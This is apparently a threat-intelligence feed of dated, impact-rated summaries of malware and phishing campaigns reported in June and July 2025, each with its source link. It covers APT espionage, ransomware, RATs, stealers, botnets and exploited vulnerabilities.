Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers from Cyfirma have uncovered a spear-phishing campaign conducted by APT36, also known as Transparent Tribe, targeting Indian defense personnel who use BOSS Linux systems. The attackers send ZIP archives containing a malicious desktop shortcut file. When clicked, it downloads and displays a legitimate PowerPoint decoy while simultaneously retrieving and launching a Go-based ELF binary in the background. The ELF payload establishes a persistent C2 channel over a non-standard port, enabling data exfiltration and covert screenshot capture. It also gathers system information, enumerates storage drives, and uses obfuscated logging routines to evade detection.
Source: https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/
2025-07-07
AiLock_Ransomware_Operation
MEDIUM
Intel Source:
Medium(S2W Threat Research)
Intel Name:
AiLock_Ransomware_Operation
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers at S2W Threat Intelligence Center have observed the AiLock ransomware campaign emerge in March 2025, leveraging a dual-threaded ChaCha20 and NTRUEncrypt engine to encrypt files and deploy ransom demands. Initial detection by Zscaler highlighted two early victims, with five organizations publicly listed on the group’s leak site by July 4, 2025, confirming active data exfiltration. The actor exploits native Windows APIs to terminate critical services and empty recycle bins, maximizing encryption coverage, while employing XOR-based string obfuscation and multithreaded I/O Completion Ports for stealth and performance.
Source: https://medium.com/s2wblog/detailed-analysis-of-ailock-ransomware-1d3263beff15?source=rss----30a8766b5c42---4
2025-07-07
Atera_RMM_Phishing_Campaign
MEDIUM
Intel Source:
KB4ThreatLabs
Intel Name:
Atera_RMM_Phishing_Campaign
Date of Scan:
2025-07-07
Impact:
MEDIUM
Summary:
Researchers from KnowBe4 ThreatLabs have identified a targeted phishing campaign exploiting Social Security statement updates to distribute a malicious MSI installer masquerading as the Atera Agent RMM. On July 3, 2025, threat actors leveraged compromised email accounts to send a lure offering a “30-day free trial,” thereby deploying the legitimate Atera RMM on Windows hosts. By abusing the platform’s living-off-the-land capabilities, adversaries establish persistent C2 channels that enable file transfers, interactive shell access and AI-assisted command execution via the RMM web console.
Source: https://x.com/Kb4Threatlabs/status/1940759187514183827
2025-07-06
XwormRAT_Distributing_via_Steganography
LOW
Intel Source:
ASEC
Intel Name:
XwormRAT_Distributing_via_Steganography
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Researchers at ASEC have uncovered a phishing campaign distributing XwormRAT malware via steganography. The attackers send phishing emails containing a compressed .RAR archive, which includes a VBScript/JavaScript hybrid file that acts as a dropper. When opened, this script runs a PowerShell command that downloads a JPEG image hiding malicious code with steganography techniques. The PowerShell script removes dummy characters from the image and decodes Base64 or bitmap-encoded data to extract and execute the final XwormRAT payload. The campaign primarily targets corporate users involved in procurement and supply chains, using fake requests for quotation from a Hong Kong-based entity as lures.
Source: https://asec.ahnlab.com/ko/88785/
2025-07-06
Amazon_Prime_Day_Phishing_Campaign
LOW
Intel Source:
Checkpoint
Intel Name:
Amazon_Prime_Day_Phishing_Campaign
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Check Point researchers have uncovered a widespread phishing campaign targeting Amazon customers ahead of Prime Day 2025, scheduled for July 8th. Threat actors have registered numerous fake domains designed to impersonate official Amazon websites and trick users into revealing their login details and payment information. These spoofed websites closely mimic Amazon’s official sign-in pages, while the phishing emails, disguised as official Amazon communications, often use urgent subject lines such as “Refund Due – Amazon System Error” to lure recipients into clicking malicious links. Upon successful compromise, attackers can gain access to user accounts, make unauthorized purchases, commit identity theft, and abuse saved gift cards.
Source: https://blog.checkpoint.com/research/amazon-prime-day-2025-deals-await-but-so-do-the-cyber-criminals-2/
2025-07-06
Hpingbot_Distributing_Malware_Via_Pastebin
MEDIUM
Intel Source:
NSFocus
Intel Name:
Hpingbot_Distributing_Malware_Via_Pastebin
Date of Scan:
2025-07-06
Impact:
MEDIUM
Summary:
NSFOCUS researchers have identified a new botnet known as hpingbot, developed in Go and designed to operate across multiple platforms, including Linux, IoT, and Windows systems. This botnet abuses Pastebin to distribute its malicious payloads and leverages hping3 to launch DDoS attacks. It has two primary objectives: first, to deliver additional malware to compromised systems, and second, to conduct network attacks that can disrupt online services. It maintains communication with its C2 server by sending small heartbeat signals to Pastebin every ten seconds and downloads additional malicious tools via curl or wget commands. The malware employs multiple techniques, such as Systemd, SysVinit, and Cron, to maintain persistence.
Source: https://nsfocusglobal.com/hpingbot-a-new-botnet-family-based-on-pastebin-payload-delivery-chain-and-hping3-ddos-module/
2025-07-06
FoxyWallet_Malware_Campaign
LOW
Intel Source:
Koi Security
Intel Name:
FoxyWallet_Malware_Campaign
Date of Scan:
2025-07-06
Impact:
LOW
Summary:
Researchers at Koi Security have discovered a malicious campaign called FoxyWallet targeting cryptocurrency users since at least April 2025. The attackers developed over 40 counterfeit Firefox browser extensions that impersonate legitimate cryptocurrency wallets such as MetaMask, Coinbase, Trust Wallet, and Phantom. These fake extensions replicate the names, logos and open-source code of the original wallets while also inflating fake reviews to trick users into downloading them. Once installed, the extensions capture seed phrases and private keys through web portal input interception and silently exfiltrate information to attacker-controlled servers along with users’ external IP addresses.
Source: https://blog.koi.security/foxywallet-40-malicious-firefox-extensions-exposed-4c14419de486
2025-07-05
Exploitation_of_Java_Debug_for_Crypto_Mining
LOW
Intel Source:
WIZ
Intel Name:
Exploitation_of_Java_Debug_for_Crypto_Mining
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
Researchers at Wiz discovered that an unknown attacker deployed a cryptomining payload after Wiz exposed Java Debug Wire Protocol (JDWP) endpoints on a decoy TeamCity CI/CD server. The attackers scan the internet for systems with the JDWP port (TCP/5005) open, confirm active sessions, and then execute system commands using Java’s built-in tools. They download a malicious script that removes other miners and installs a hidden version of the XMRig miner disguised as a logrotate utility. To maintain persistence, the attackers make changes to ensure the miner restarts on login, reboot, or at scheduled times. They also leverage proxies and hardcoded configuration to hide the cryptocurrency wallet address and evade detection.
Source: https://www.wiz.io/blog/exposed-jdwp-exploited-in-the-wild
2025-07-05
Exploitation_of_SHELLTER_Framework_to_Spread_Malware
LOW
Intel Source:
Elastic Labs
Intel Name:
Exploitation_of_SHELLTER_Framework_to_Spread_Malware
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
Researchers at Elastic Security have uncovered several financially motivated cyber campaigns leveraging SHELLTER Elite v11.0 to distribute data-stealing malware. This tool, which was released in April 2025, is being abused by attackers for its evasion capabilities. It enables malware to bypass both traditional antivirus and behaviour-based detection mechanisms by employing techniques such as AES-128 CBC encryption, fake code to confuse scanners, API obfuscation, and in-memory bypasses for Windows security features like AMSI. Additionally, attackers utilize stealth techniques including DLL preloading and indirect system calls to avoid detection. Researchers also identified three prominent infostealers being used—LUMMA, ARECHCLIENT2 (also known as Sectop RAT), and RHADAMANTHYS—each distributed through various platforms such as MediaFire, YouTube comments, and even underground forums.
Source: https://www.elastic.co/security-labs/taking-shellter
2025-07-05
MentalPositive_macOS_Stealer_Variant
LOW
Intel Source:
K7 Labs
Intel Name:
MentalPositive_macOS_Stealer_Variant
Date of Scan:
2025-07-05
Impact:
LOW
Summary:
K7 Security Labs researchers have observed a new macOS stealer attributed to the actor "mentalpositive," which mirrors core functionalities of the 2023 Atomic macOS Stealer (AMOS) but introduces distinct characteristics suggesting a potential fork or early-stage evolution. The malware targets macOS users and executes using Unix process-hollowing tactics to evade terminal and session management detection, employing system calls to disable terminal processes and maintain stealth.
Source: https://labs.k7computing.com/index.php/mentalpositives-new-macos-stealer-amos-repackaged-or-a-new-cyber-threat/
2025-07-04
Ivanti_CSA_Zero_Day_Exploitation_Campaign
HIGH
Intel Source:
France’s Cybersecurity Agency - ANSSI
Intel Name:
Ivanti_CSA_Zero_Day_Exploitation_Campaign
Date of Scan:
2025-07-04
Impact:
HIGH
Summary:
According to ANSSI’s analysis, the Houken intrusion set leveraged three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CVE-2024-8190, CVE-2024-8963 and CVE-2024-9380) in September 2024 to gain initial access to French governmental, telecommunications, media, finance and transport networks. Operators executed a base64-encoded Python script to decrypt and harvest administrative credentials, deployed or created PHP webshells, modified legitimate PHP resources to embed backdoors and occasionally installed a sophisticated kernel-space rootkit for persistence. Infrastructure relied on commercial VPN services, Tor exit nodes and diverse VPS configurations, indicating a blend of commodity services and bespoke tooling. ANSSI suspects Houken acts as an initial access broker linked to UNC5174, selling footholds to state-linked entities while also exhibiting profit-driven behaviors such as data exfiltration and cryptomining.
Source: https://www.cert.ssi.gouv.fr/uploads/CERTFR-2025-CTI-009.pdf
2025-07-04
Phishing_Campaigns_Exploit_ES_Domains_of_Spain
LOW
Intel Source:
Cofense
Intel Name:
Phishing_Campaigns_Exploit_ES_Domains_of_Spain
Date of Scan:
2025-07-04
Impact:
LOW
Summary:
Researchers at Cofense have observed a significant increase in the use of Spain’s top-level domain ending in [.]es to conduct phishing campaigns. The volume of malicious .es websites leveraged for phishing jumped nearly 20 times between late 2024 and early 2025. Threat actors are distributing emails containing .es links, either embedded directly in the message or within attachments to trick people into clicking. These links often redirect to deceptive login pages designed to steal usernames and passwords, especially for Microsoft accounts. These phishing campaigns impersonate major organisations such as Microsoft, Adobe and Google. These phishing sites are hosted on Cloudflare infrastructure and employ CAPTCHA challenges to enhance legitimacy and evade automated detection.
Source: https://cofense.com/blog/spain-tld-s-recent-rise-to-dominance
2025-07-04
Chinese_Actors_Targeting_E_Commerce_Websites
MEDIUM
Intel Source:
Silent Push
Intel Name:
Chinese_Actors_Targeting_E_Commerce_Websites
Date of Scan:
2025-07-04
Impact:
MEDIUM
Summary:
Researchers at Silent Push have uncovered a large-scale phishing campaign operated by a Chinese-speaking threat actor targeting online shoppers around the globe via thousands of spoofed e-commerce websites. These deceptive websites impersonate legitimate online retailers such as Apple, PayPal, Wayfair, REI, Michael Kors, and Nordstrom to execute fraudulent payment schemes. The campaign emerged during Mexico’s Hot Sale 2025 event, targeting Spanish-speaking users, but subsequent analysis revealed a widespread operation also targeting English-speaking consumers across multiple regions. Many of the spoofed domains embed functional Google Pay widgets that allow the attacker to steal legitimate payments through real transactions. The threat actors employ various tactics, including website cloning, abuse of online payment APIs, and site misdirection using deceptive branding and domain obfuscation. Researchers also believe that thousands of fraudulent sites remain active despite takedown efforts.
Source: https://www.silentpush.com/blog/fake-marketplace/?utm_source=rss&utm_medium=rss&utm_campaign=fake-marketplace
2025-07-04
LNK_Malware_Abuse_for_Stealthy_Payload_Delivery
MEDIUM
Intel Source:
unit42
Intel Name:
LNK_Malware_Abuse_for_Stealthy_Payload_Delivery
Date of Scan:
2025-07-04
Impact:
MEDIUM
Summary:
Researchers from Unit 42 have identified extensive and evolving misuse of Windows Shortcut (LNK) files by threat actors to facilitate covert malware execution. Adversaries are abusing the flexibility of LNK files to execute embedded or referenced payloads using trusted system binaries such as powershell.exe, cmd.exe, wscript.exe, and rundll32.exe. The observed techniques fall into four main categories: exploit-based execution, direct file execution, in-argument script execution, and overlay content delivery. The latter is increasingly favored, with attackers appending encoded malicious content to the end of LNK files and executing it through scripts or utilities like findstr or mshta.exe. Obfuscation of command-line arguments, dynamic environment variable usage, and base64-encoded payloads are employed to evade detection and hinder analysis.
Source: https://unit42.paloaltonetworks.com/lnk-malware/
2025-07-03
DPRK_NimDoor_Malware_Targeting_macOS
LOW
Intel Source:
SentinelLABS
Intel Name:
DPRK_NimDoor_Malware_Targeting_macOS
Date of Scan:
2025-07-03
Impact:
LOW
Summary:
SentinelLABS researchers have uncovered a sophisticated campaign by DPRK threat actors, dubbed NimDoor, targeting Web3 and crypto-related businesses on the macOS platform. The operation, active since at least April 2025, begins with social engineering to trick users into running a malicious AppleScript disguised as a Zoom update. This initiates a multi-stage attack using an eclectic mix of C++, AppleScript, and Nim-compiled binaries. The actors employ advanced and unusual TTPs for macOS, including process injection, encrypted WebSocket (wss) for C2 communications, and a novel persistence mechanism that uses signal handlers (SIGINT/SIGTERM) to install a LaunchAgent upon termination. The ultimate goal is to exfiltrate sensitive data, including Keychain credentials, browser data, and Telegram user information, using custom Bash scripts.
Source: https://www.sentinelone.com/labs/macos-nimdoor-dprk-threat-actors-target-web3-and-crypto-platforms-with-nim-based-malware/
2025-07-03
DCRat_Masquerades_as_Colombian_Government
MEDIUM
Intel Source:
Fortinet
Intel Name:
DCRat_Masquerades_as_Colombian_Government
Date of Scan:
2025-07-03
Impact:
MEDIUM
Summary:
Researchers at FortiGuard Labs have identified an ongoing malware campaign leveraging DCRat, a modular remote access trojan, to target entities in Colombia through a phishing operation that impersonates a Colombian government agency. The attack chain begins with a ZIP file delivered via email, containing an obfuscated VBS script designed to evade detection and analysis. This script launches obfuscated PowerShell code that retrieves a second-stage image payload encoded with base64 data and steganography, which ultimately delivers the RAT executable.
Source: https://www.fortinet.com/blog/threat-research/dcrat-impersonating-the-columbian-government
2025-07-02
Janela_RAT_with_Chromium_Stealer_Extension
LOW
Intel Source:
Medium (Walmart Global Tech Blog)
Intel Name:
Janela_RAT_with_Chromium_Stealer_Extension
Date of Scan:
2025-07-02
Impact:
LOW
Summary:
Walmart Global Tech researchers have observed a multi-stage attack campaign delivering Janela RAT alongside a malicious browser extension, leveraging MSI installers hosted on GitLab. The Janela RAT, a likely variant of BX RAT previously linked to LATAM targeting, is dropped via an installer that embeds a Go-based binary and multiple scripts. These scripts establish execution logic, unzip payloads, and load the browser extension covertly into Chromium-based browsers using native messaging APIs. The extension is equipped to execute commands such as screenshot capture, system reconnaissance, and data collection, including cookies, browsing history, and installed extensions. Command and control (C2) communication is facilitated via WebSockets and encoded configuration retrieved from GitLab-hosted files.
Source: https://medium.com/walmartglobaltech/janela-rat-and-a-stealer-extension-delivered-together-e274469a7df8
2025-07-02
Snake_Keylogger_Phishing_Targets_Oil_Sector
MEDIUM
Intel Source:
OTS Security
Intel Name:
Snake_Keylogger_Phishing_Targets_Oil_Sector
Date of Scan:
2025-07-02
Impact:
MEDIUM
Summary:
OTS Security researchers have observed a new spear-phishing campaign that delivers the Russian-origin Snake Keylogger to targets in the global oil and gas industry by impersonating a Kazakh petroleum company. The attack uses a novel DLL sideloading technique, abusing the legitimate Java utility jsadebugd.exe to inject the stealer malware into the InstallUtil.exe process. Once active, the malware establishes persistence via a registry Run key and harvests a wide range of credentials from dozens of browsers and applications for exfiltration over SMTP.
Source: https://mp.weixin.qq.com/s/cQ0cV_lbvGH3q6JI8TtNRQ
2025-07-02
DEVMAN_Ransomware
MEDIUM
Intel Source:
ANY.RUN
Intel Name:
DEVMAN_Ransomware
Date of Scan:
2025-07-02
Impact:
MEDIUM
Summary:
Researchers at ANY.RUN have uncovered a new ransomware strain, DEVMAN, operating as a custom variant within the DragonForce Ransomware-as-a-Service (RaaS) ecosystem. The actor primarily targets victims across Asia and Africa, using a dedicated leak site to pressure victims after data exfiltration and encryption. While reusing a significant amount of DragonForce's Conti-derived codebase, DEVMAN introduces unique traits, such as a flawed builder that encrypts its own ransom notes. Key TTPs include probing for SMB shares to spread laterally and abusing the Windows Restart Manager to bypass file locks and encrypt critical system files like NTUSER.DAT.
Source: https://any.run/cybersecurity-blog/devman-ransomware-analysis/
2025-07-01
CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet
MEDIUM
Intel Source:
PolySwarm
Intel Name:
CVE_2025_3248_Langflow_Exploit_for_Flodrix_Botnet
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
PolySwarm researchers have identified active exploitation of a critical unauthenticated remote code execution vulnerability — CVE-2025-3248 — in the Langflow AI development framework. Threat actors are leveraging publicly available proof-of-concept exploits to compromise unpatched Langflow instances and deploy the Flodrix botnet, a more advanced variant of the LeetHozer malware family. The attack chain begins with widespread scanning for exposed Langflow deployments, followed by exploitation to deliver a Python-based payload. Once infected, the Flodrix malware enables attackers to conduct DDoS attacks and potentially exfiltrate sensitive data, while employing evasion tactics such as self-deletion and string obfuscation to bypass detection. With a CVSS score of 9.8, this vulnerability presents a severe risk of complete system compromise and service disruption for organizations running outdated or unpatched versions of Langflow.
Source: https://blog.polyswarm.io/threat-actors-exploit-cve-2025-3248-to-deliver-flodrix-botnet
2025-07-01
UAC_0226_Targets_Government_and_Defence_Entities
MEDIUM
Intel Source:
Arctic Wolf Labs
Intel Name:
UAC_0226_Targets_Government_and_Defence_Entities
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers from Arctic Wolf have identified a malware named GIFTEDCROOK, developed by the cyber-espionage group UAC-0226. Initially a basic browser credential stealer, the malware has transformed into a sophisticated data exfiltration platform. The latest version (v1.3) is capable of stealing not only browser data but also sensitive files selected by their type, size, and recent changes. UAC-0226 distributes this malware through spear-phishing emails containing fake military-themed PDF attachments that impersonate Ukrainian government agencies. These campaigns coincided with critical geopolitical events, including the June 2025 Ukraine-Russia negotiations in Istanbul, which shows that the attackers are targeting Ukrainian government and military information for intelligence purposes. The malware employs encrypted file archives, sends stolen data through Telegram channels and deletes itself to evade detection.
Source: https://arcticwolf.com/resources/blog/giftedcrook-strategic-pivot-from-browser-stealer-to-data-exfiltration-platform/
2025-07-01
Anubis_RaaS_with_Wiper_Capability
MEDIUM
Intel Source:
picussecurity
Intel Name:
Anubis_RaaS_with_Wiper_Capability
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers at Picus Security have detailed the Anubis Ransomware-as-a-Service (RaaS) operation, a significant threat observed since December 2024 that has evolved to combine data encryption with an optional, destructive file-wiping function. Operators gain initial access via spear-phishing before executing the payload, which is highly configurable through command-line parameters. The malware performs stealthy privilege checks, disables security and backup services, and deletes Volume Shadow Copies to maximize impact and prevent recovery.
Source: https://www.picussecurity.com/resource/blog/anubis-ransomware-targets-global-victims-with-wiper-functionality
2025-07-01
RansomHub_Exploits_RDP_via_Password_Spray
MEDIUM
Intel Source:
The DFIR Report
Intel Name:
RansomHub_Exploits_RDP_via_Password_Spray
Date of Scan:
2025-07-01
Impact:
MEDIUM
Summary:
Researchers at The DFIR Report have observed a RansomHub affiliate campaign actively compromising networks through password spray attacks against exposed Remote Desktop Protocol (RDP) services, achieving complete network compromise and ransomware deployment in under six days. Following initial access, the attacker moves rapidly, using tools like Mimikatz for credential harvesting and network scanners for discovery. Persistence is established using legitimate remote management tools such as Atera and Splashtop to blend in with normal administrative activity.
Source: https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/
2025-06-30
Blind_Eagle_Phishing_Campaign
MEDIUM
Intel Source:
Darktrace
Intel Name:
Blind_Eagle_Phishing_Campaign
Date of Scan:
2025-06-30
Impact:
MEDIUM
Summary:
Researchers at Darktrace have identified that the threat actor known as Blind Eagle (APT-C-36) is actively carrying out a phishing campaign targeting organizations across Latin America, with a particular emphasis on Colombia. The group primarily focuses on the government, financial, and critical infrastructure sectors. Their attack chain typically begins with a phishing email that leads victims to download a malicious payload, often exploiting the WebDAV protocol. Blind Eagle has shown a high degree of adaptability, continuing to employ low-interaction attack techniques even after the relevant Microsoft vulnerability was patched. The group uses Remote Access Trojans (RATs) and Dynamic DNS to establish resilient command-and-control (C2) infrastructure, enabling persistent access and extensive data exfiltration.
Source: https://www.darktrace.com/blog/patch-and-persist-darktraces-detection-of-blind-eagle-apt-c-36?&web_view=true
2025-06-30
Remcos_Malware_Campaign
LOW
Intel Source:
ForcePoint
Intel Name:
Remcos_Malware_Campaign
Date of Scan:
2025-06-30
Impact:
LOW
Summary:
Forcepoint researchers have uncovered an ongoing Remcos malware campaign that leverages phishing emails from compromised email accounts belonging to small businesses and educational institutions to maintain long-term access to infected systems. These emails contain malicious LNK files inside TAR archives, which trigger a PowerShell script that downloads a hidden malware file disguised as a PDF. The malware leverages a special path-parsing technique (\\?\C:\) to create fake Windows directories. It uses heavily obfuscated batch scripts and renames system tools to evade detection. The malware establishes persistence via scheduled tasks and weakens UAC protections by modifying registry settings. Once active, the malware injects itself into legitimate Windows processes like SndVol.exe and communicates with a C2 server hosted on OVHcloud over an uncommon port to receive instructions and send back stolen data.
Source: https://www.forcepoint.com/blog/x-labs/remcos-malware-new-face
2025-06-28
APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors
MEDIUM
Intel Source:
CERT-UA
Intel Name:
APT28_Deploys_BEARDSHELL_and_COVENANT_Backdoors
Date of Scan:
2025-06-28
Impact:
MEDIUM
Summary:
CERT-UA researchers have observed that the UAC-0001 threat group (APT28) conducted a multi-stage cyber attack against Ukrainian government agencies in March-April 2024. The actors deployed a sophisticated toolset that includes the BEARDSHELL and SLIMAGENT backdoors, as well as the open-source COVENANT C2 framework. Initial access was likely gained through a malicious document delivered via the Signal messenger, which executed a macro to initiate a complex infection chain. This chain uses COM hijacking for persistence and leverages legitimate cloud services, such as Koofr and Icedrive, for C2 communications, making the traffic difficult to detect. The final payload, BEARDSHELL, is a C++ backdoor capable of loading and executing PowerShell scripts. The attack's objective appears to be espionage, underscored by the deployment of SLIMAGENT, a tool designed for taking and exfiltrating encrypted screenshots.
Source: https://cert.gov.ua/article/6284080
2025-06-27
APT38_Infrastructure_Hunt_Uncovers_macOS_Malware
MEDIUM
Intel Source:
Darkatlas
Intel Name:
APT38_Infrastructure_Hunt_Uncovers_macOS_Malware
Date of Scan:
2025-06-27
Impact:
MEDIUM
Summary:
Darkatlas researchers have uncovered an active command-and-control infrastructure belonging to the North Korean state-sponsored threat actor APT38 (Bluenoroff). This financially motivated subgroup of the Lazarus Group continues to target the global financial sector, including banks, cryptocurrency exchanges, and SWIFT endpoints. By pivoting on technical fingerprints, such as the JARM hash of a known malicious server's SSL certificate, researchers identified a network of related infrastructure. This network was subsequently linked to the deployment of the Cosmic Rust malware family, a payload specifically designed to target macOS platforms. The findings demonstrate that APT38 remains active, is expanding its operational infrastructure, and is leveraging macOS malware as part of its espionage and theft campaigns.
Source: https://darkatlas.io/blog/bluenoroff-apt38-live-infrastructure-hunting
2025-06-27
SSA_Themed_Phishing_Campaign
LOW
Intel Source:
Cyberarmor
Intel Name:
SSA_Themed_Phishing_Campaign
Date of Scan:
2025-06-27
Impact:
LOW
Summary:
Researchers at CyberArmor have discovered a phishing campaign in which cybercriminals tricked over 2,000 people by impersonating official communications from the U.S. Social Security Administration (SSA). The attackers send phishing emails containing links that redirect to a deceptive SSA-themed page hosted on Amazon Web Services. This page instructs victims to click “Access The Statement”, which redirects them to another page with instructions to download and execute a file. The downloaded file is a .NET-based malware loader. Once executed, the malware deploys ScreenConnect for remote access and activates a backdoor named ENTRYPOINT to silently connect to the attacker’s server and gain control over the victim’s system.
Source: https://cyberarmor.tech/hacker-exploit-social-security-statement-theme-to-target-over-2000-victims-with-malware/
2025-06-26
Odyssey_Stealer_macOS_Infostealer
LOW
Intel Source:
Cyfirma
Intel Name:
Odyssey_Stealer_macOS_Infostealer
Date of Scan:
2025-06-26
Impact:
LOW
Summary:
Researchers at CYFIRMA have identified Odyssey Stealer, a Malware-as-a-Service (MaaS) info-stealer actively targeting macOS users. Attributed to a threat actor known as "Rodrigo," the malware is a rebrand of Poseidon Stealer and targets individuals in Western countries interested in finance and cryptocurrency, with command-and-control infrastructure primarily hosted in Russia. The attack begins with a "Clickfix" social engineering tactic, using typosquatted domains that present a fake Cloudflare CAPTCHA to trick users into running a malicious AppleScript command in their terminal. This script executes the primary payload, which is designed to steal a wide range of sensitive data, including browser credentials, session tokens, personal documents, macOS Keychain data, and, critically, private keys and seed phrases from numerous cryptocurrency wallets.
Source: https://www.cyfirma.com/research/odyssey-stealer-the-rebrand-of-poseidon-stealer/
2025-06-26
WogRAT_Malware_Targets_Window_and_Linux_Systems
LOW
Intel Source:
ASEC
Intel Name:
WogRAT_Malware_Targets_Window_and_Linux_Systems
Date of Scan:
2025-06-26
Impact:
LOW
Summary:
ASEC researchers have discovered a coordinated campaign that targets both Windows and Linux web servers, including IIS-based systems. The attackers gain initial access through file upload vulnerabilities to deploy ASP/ASPX web shells, enabling persistent access and command execution. After gaining access, the attackers leverage tools like Ladon, Fscan, MeshAgent, and WogRAT for scanning, privilege escalation, and remote access. The attackers show advanced capabilities by deploying malware that works on both Windows (PE) and Linux (ELF) systems. They also move across the network using Windows tools like WMIExec and steal login details using credential dumping tools such as Network Password Dump.
Source: https://asec.ahnlab.com/ko/88559/
2025-06-25
Confucius_APT_Deploys_New_Anondoor_Backdoor
MEDIUM
Intel Source:
Knowsec 404 Advanced Threat Intelligence Team
Intel Name:
Confucius_APT_Deploys_New_Anondoor_Backdoor
Date of Scan:
2025-06-25
Impact:
MEDIUM
Summary:
The Knowsec 404 Advanced Threat Intelligence Team has identified an evolved malware campaign from the Confucius APT group. This campaign, targeting government and military entities in South and East Asia, deploys a new componentized backdoor named "anondoor." The attack initiates via an LNK file which uses a legitimate Python executable to side-load the malicious anondoor DLL. A key evolution in this campaign is the malware's modularity; anondoor acts as a downloader, receiving instructions and C2 details from the server to fetch and execute subsequent components, such as the "wooperstealer" infostealer. Persistence is established via a scheduled task created by the initial implant.
Source: https://paper.seebug.org/3332/
2025-06-25
ASP_Phishing_Targets_Critics_of_Russia
MEDIUM
+
Intel Source:
Google Threat Intelligence
Intel Name:
ASP_Phishing_Targets_Critics_of_Russia
Date of Scan:
2025-06-25
Impact:
MEDIUM
Summary:
Researchers at Google Threat Intelligence Group (GTIG) report on a sophisticated social engineering campaign by UNC6293, a threat actor assessed with low confidence as being associated with the Russia-linked group APT29. Active since at least April 2025, the campaign targets prominent academics and critics of Russia to gain persistent access to their Gmail accounts. Attackers build rapport with targets before sending lures impersonating entities like the U.S. Department of State, using spoofed email addresses to enhance legitimacy. The objective is to convince the target to create a Google Application Specific Password (ASP) and share the 16-digit code, a method which bypasses standard multi-factor authentication and grants the actor ongoing access to the victim's mailbox.
Source: https://cloud.google.com/blog/topics/threat-intelligence/creative-phishing-academics-critics-of-russia
2025-06-24
Pickai_AI_Backdoor_Supply_Chain_Attack
LOW
+
Intel Source:
Xlab
Intel Name:
Pickai_AI_Backdoor_Supply_Chain_Attack
Date of Scan:
2025-06-24
Impact:
LOW
Summary:
Researchers from XLab have discovered that threat actors are actively exploiting vulnerabilities in the ComfyUI AI framework to deploy a C++ backdoor named Pickai. First observed in February 2025, the campaign's primary objective is the theft of sensitive AI-related data, leveraging command execution and reverse shell capabilities. The malware achieves stealth through process name spoofing and ensures survivability with a highly redundant persistence strategy, creating up to ten distinct service entries on compromised Linux hosts. In a significant escalation, the threat has become a supply chain attack, with malware being distributed from the compromised infrastructure of Rubick.ai, a commercial AI platform serving the e-commerce sector.
Source: https://blog.xlab.qianxin.com/pickai-the_backdoor_hiding_in_your_ai_stack/
2025-06-23
RapperBot_IoT_Botnet_Adds_Extortion
LOW
+
Intel Source:
Xlab Blog (Wang Hao)
Intel Name:
RapperBot_IoT_Botnet_Adds_Extortion
Date of Scan:
2025-06-23
Impact:
LOW
Summary:
Analysis from Qi'anxin's XLAB has revealed the continued evolution of the RapperBot botnet, a large-scale threat that has been active since at least 2021. Primarily used for DDoS-for-hire attacks, the botnet has recently pivoted to include direct extortion, demanding "protection fees" from victims. Comprising over 50,000 bots, the malware targets a wide range of industries globally by exploiting weak Telnet credentials and known vulnerabilities in IoT devices like routers and network cameras. The botnet employs evolving DNS-TXT records for C2 discovery and features multiple custom encryption routines to protect its components.
Source: https://blog.xlab.qianxin.com/rapperbot-en/
2025-06-22
LogMeIn_RAT_Delivered_via_Vercel_Phishing
LOW
+
Intel Source:
CyberArmor
Intel Name:
LogMeIn_RAT_Delivered_via_Vercel_Phishing
Date of Scan:
2025-06-22
Impact:
LOW
Summary:
Researchers at CyberArmor have identified a phishing campaign, active for at least the past two months, where threat actors are abusing the legitimate Vercel hosting platform to deliver a malicious version of the LogMeIn remote access tool. Attackers use phishing emails with lures related to invoices and deliveries to direct victims to Vercel-hosted websites that impersonate an Adobe PDF viewer. Social engineering convinces the user to download and run an executable file, which installs the remote access tool and grants the attacker full control over the compromised machine. This abuse of trusted services like Vercel and LogMeIn is a deliberate tactic to bypass security controls and lower user suspicion, making detection difficult.
Source: https://cyberarmor.tech/threat-insight-cybercriminals-abusing-vercel-to-deliver-remote-access-malware/
2025-06-22
PowerShell_Loaders_Deploy_Cobalt_Strike
MEDIUM
+
Intel Source:
Hunt.IO
Intel Name:
PowerShell_Loaders_Deploy_Cobalt_Strike
Date of Scan:
2025-06-22
Impact:
MEDIUM
Summary:
Researchers at Hunt.io have identified a threat campaign leveraging PowerShell loaders to deliver Cobalt Strike beacons, utilizing infrastructure across China, Russia, and other global cloud platforms. Discovered in late May and early June 2025, the attack begins with a PowerShell script retrieved from an open directory on a Chinese server. This script executes shellcode in-memory, employing API hashing and reflective DLL injection to evade detection. The initial payload connects to a second-stage server on Baidu's cloud platform to retrieve the final Cobalt Strike beacon, which then communicates with a command-and-control server in Russia.
Source: https://hunt.io/blog/cobaltstrike-powershell-loader-chinese-russian-infrastructure
2025-06-21
TxTag_Toll_Phishing_Campaign
LOW
+
Intel Source:
Cofense
Intel Name:
TxTag_Toll_Phishing_Campaign
Date of Scan:
2025-06-21
Impact:
LOW
Summary:
Cofense researchers have discovered a phishing campaign impersonating TxTag, a legitimate toll collection service in Texas. The attackers send phishing emails that spoof a legitimate Indiana state government email address, leveraging a legitimate domain to deceive recipients. The email warns recipients about unpaid toll fees and threatens penalties or vehicle registration holds to induce urgency. If recipients click the embedded link, they are redirected to a deceptive website disguised as the official TxTag site, hosted on a fake domain (txtag-help[.]xyz), where victims are asked to enter personal information, credit card details, and additional payment data if the fake payment form claims the initial attempt failed.
Source: https://cofense.com/blog/txtag-takedown-busting-phishing-email-schemes
2025-06-20
SERPENTINE_CLOUD_Campaign
MEDIUM
+
Intel Source:
Securonix Threat Lab
Intel Name:
SERPENTINE_CLOUD_Campaign
Date of Scan:
2025-06-20
Impact:
MEDIUM
Summary:
